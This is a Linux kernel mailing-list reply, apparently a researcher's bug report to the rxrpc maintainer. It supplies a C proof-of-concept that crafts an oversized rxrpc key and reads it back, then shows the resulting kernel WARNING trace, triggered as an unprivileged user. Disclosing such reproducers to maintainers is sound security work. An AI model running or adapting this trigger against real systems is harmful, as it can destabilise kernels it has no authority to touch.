Re: [BUG] rxrpc: Client connection leak and BUG() call during kernel IO thread exit

[Anderson Nascimento]

Hi David,

On Wed, Apr 22, 2026 at 1:08 PM David Howells <dhowells@xxxxxxxxxx> wrote:
>
> Do you by any chance have a reproducer program for this?

Yes, you can find it below. The code is not polished, but it works.

> David
>

#include <stdio.h>
#include <string.h>
#include <keyutils.h>

struct rxrpc_key_data_v1 {
uint16_t             security_index;
uint16_t             ticket_length;
uint32_t             expiry;
uint32_t             kvno;
uint8_t              session_key[8];
uint8_t              ticket[];
};

#define TICKET_LENGTH 16349

int main(int argc,char *argv[]){
struct rxrpc_key_data_v1 *v1;
key_serial_t key;
char *key_description = "afs@2";
char payload[16384 + 4 + 100];
char ticket[16384 + 4];
char session_key[8];
unsigned int plen;
uint32_t kver = 1;

memset(&payload, '\0', sizeof(payload));
memset(&ticket, '\0', sizeof(ticket));
memset(&session_key, '\0', sizeof(session_key));
memcpy(&payload, &kver, sizeof(kver));

v1 = (struct rxrpc_key_data_v1 *)((char *)&payload + sizeof(kver));

v1->security_index = 2;
v1->ticket_length = TICKET_LENGTH;
v1->kvno = 1;

memcpy(v1->session_key, session_key, sizeof(v1->session_key));
memcpy(v1->ticket, &ticket, TICKET_LENGTH);

plen = sizeof(kver) + sizeof(struct rxrpc_key_data_v1) + TICKET_LENGTH;

key = add_key("rxrpc", key_description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);

keyctl(KEYCTL_READ, key, payload, 4096);

return 0;
}

It generates the following splat.

[  123.636173] ------------[ cut here ]------------
[  123.636176] WARNING: CPU: 2 PID: 1528 at net/rxrpc/key.c:778
rxrpc_read+0x109/0x5c0 [rxrpc]
[  123.636214] Modules linked in: fcrypt pcbc rxrpc ip6_udp_tunnel
krb5 udp_tunnel rfkill nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib
nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct
nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4
nf_tables intel_rapl_msr intel_rapl_common
intel_uncore_frequency_common intel_pmc_core pmt_telemetry
pmt_discovery pmt_class qrtr intel_pmc_ssram_telemetry intel_vsec rapl
vmw_balloon sunrpc vmxnet3 i2c_piix4 i2c_smbus binfmt_misc joydev loop
dm_multipath nfnetlink zram lz4hc_compress lz4_compress
vmw_vsock_vmci_transport vsock vmw_vmci xfs nvme nvme_core
polyval_clmulni ghash_clmulni_intel nvme_keyring vmwgfx nvme_auth hkdf
drm_ttm_helper ata_generic pata_acpi ttm serio_raw scsi_dh_rdac
scsi_dh_emc scsi_dh_alua i2c_dev fuse
[  123.636257] CPU: 2 UID: 1000 PID: 1528 Comm: poc Not tainted
6.18.13-200.fc43.x86_64 #1 PREEMPT(lazy)
[  123.636259] Hardware name: VMware, Inc. VMware Virtual
Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[  123.636260] RIP: 0010:rxrpc_read+0x109/0x5c0 [rxrpc]
[  123.636284] Code: 03 66 83 f8 02 0f 85 5e 02 00 00 80 7b 02 00 74
9f f6 05 89 df 2a 00 04 0f 85 87 58 01 00 b8 28 00 00 00 b9 24 00 00
00 eb b1 <0f> 0b 48 c7 c0 fb ff ff ff 48 8b 54 24 40 65 48 2b 15 19 da
ea c3
[  123.636285] RSP: 0018:ffffc9000274bc70 EFLAGS: 00010202
[  123.636287] RAX: ffff8881082e0000 RBX: ffff888104a78e20 RCX: 0000000000000000
[  123.636288] RDX: 0000000000000000 RSI: ffff88810aeac000 RDI: ffff8881037bf1f4
[  123.636289] RBP: 0000000000004004 R08: 0000000000001000 R09: 0000000000000001
[  123.636289] R10: 0000000000000004 R11: ffff88810aeac000 R12: 0000000000000010
[  123.636290] R13: ffff88810aeac000 R14: 0000000000001000 R15: ffff8881023e9f00
[  123.636291] FS:  00007f6f8611d740(0000) GS:ffff8882af726000(0000)
knlGS:0000000000000000
[  123.636293] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  123.636293] CR2: 00007fff0bf73000 CR3: 0000000108146006 CR4: 00000000003706f0
[  123.636312] Call Trace:
[  123.636314]  <TASK>
[  123.636316]  ? keyctl_read_key+0xec/0x230
[  123.636320]  keyctl_read_key+0x131/0x230
[  123.636322]  do_syscall_64+0x7e/0x7f0
[  123.636325]  ? __folio_mod_stat+0x2d/0x90
[  123.636328]  ? set_ptes.isra.0+0x36/0x80
[  123.636329]  ? do_anonymous_page+0x100/0x520
[  123.636332]  ? __handle_mm_fault+0x551/0x6a0
[  123.636334]  ? count_memcg_events+0xd6/0x220
[  123.636337]  ? handle_mm_fault+0x248/0x360
[  123.636339]  ? do_user_addr_fault+0x21a/0x690
[  123.636341]  ? clear_bhb_loop+0x50/0xa0
[  123.636344]  ? clear_bhb_loop+0x50/0xa0
[  123.636345]  ? clear_bhb_loop+0x50/0xa0
[  123.636346]  ? clear_bhb_loop+0x50/0xa0
[  123.636347]  entry_SYSCALL_64_after_hwframe+0x76/0x7e
[  123.636349] RIP: 0033:0x7f6f8621338d
[  123.636356] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e
fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24
08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 43 5a 0f 00 f7 d8 64 89
01 48
[  123.636357] RSP: 002b:00007fff0bf70528 EFLAGS: 00000246 ORIG_RAX:
00000000000000fa
[  123.636358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6f8621338d
[  123.636359] RDX: 00007fff0bf74640 RSI: 000000003809ba43 RDI: 000000000000000b
[  123.636360] RBP: 00007fff0bf70600 R08: 00000000fffffffe R09: 0000003000000008
[  123.636361] R10: 0000000000001000 R11: 0000000000000246 R12: 00007fff0bf787e8
[  123.636362] R13: 0000000000000001 R14: 00007f6f86361000 R15: 0000000000402df0
[  123.636364]  </TASK>
[  123.636365] ---[ end trace 0000000000000000 ]---




--
Anderson Nascimento
Allele Security Intelligence
https://www.allelesecurity.com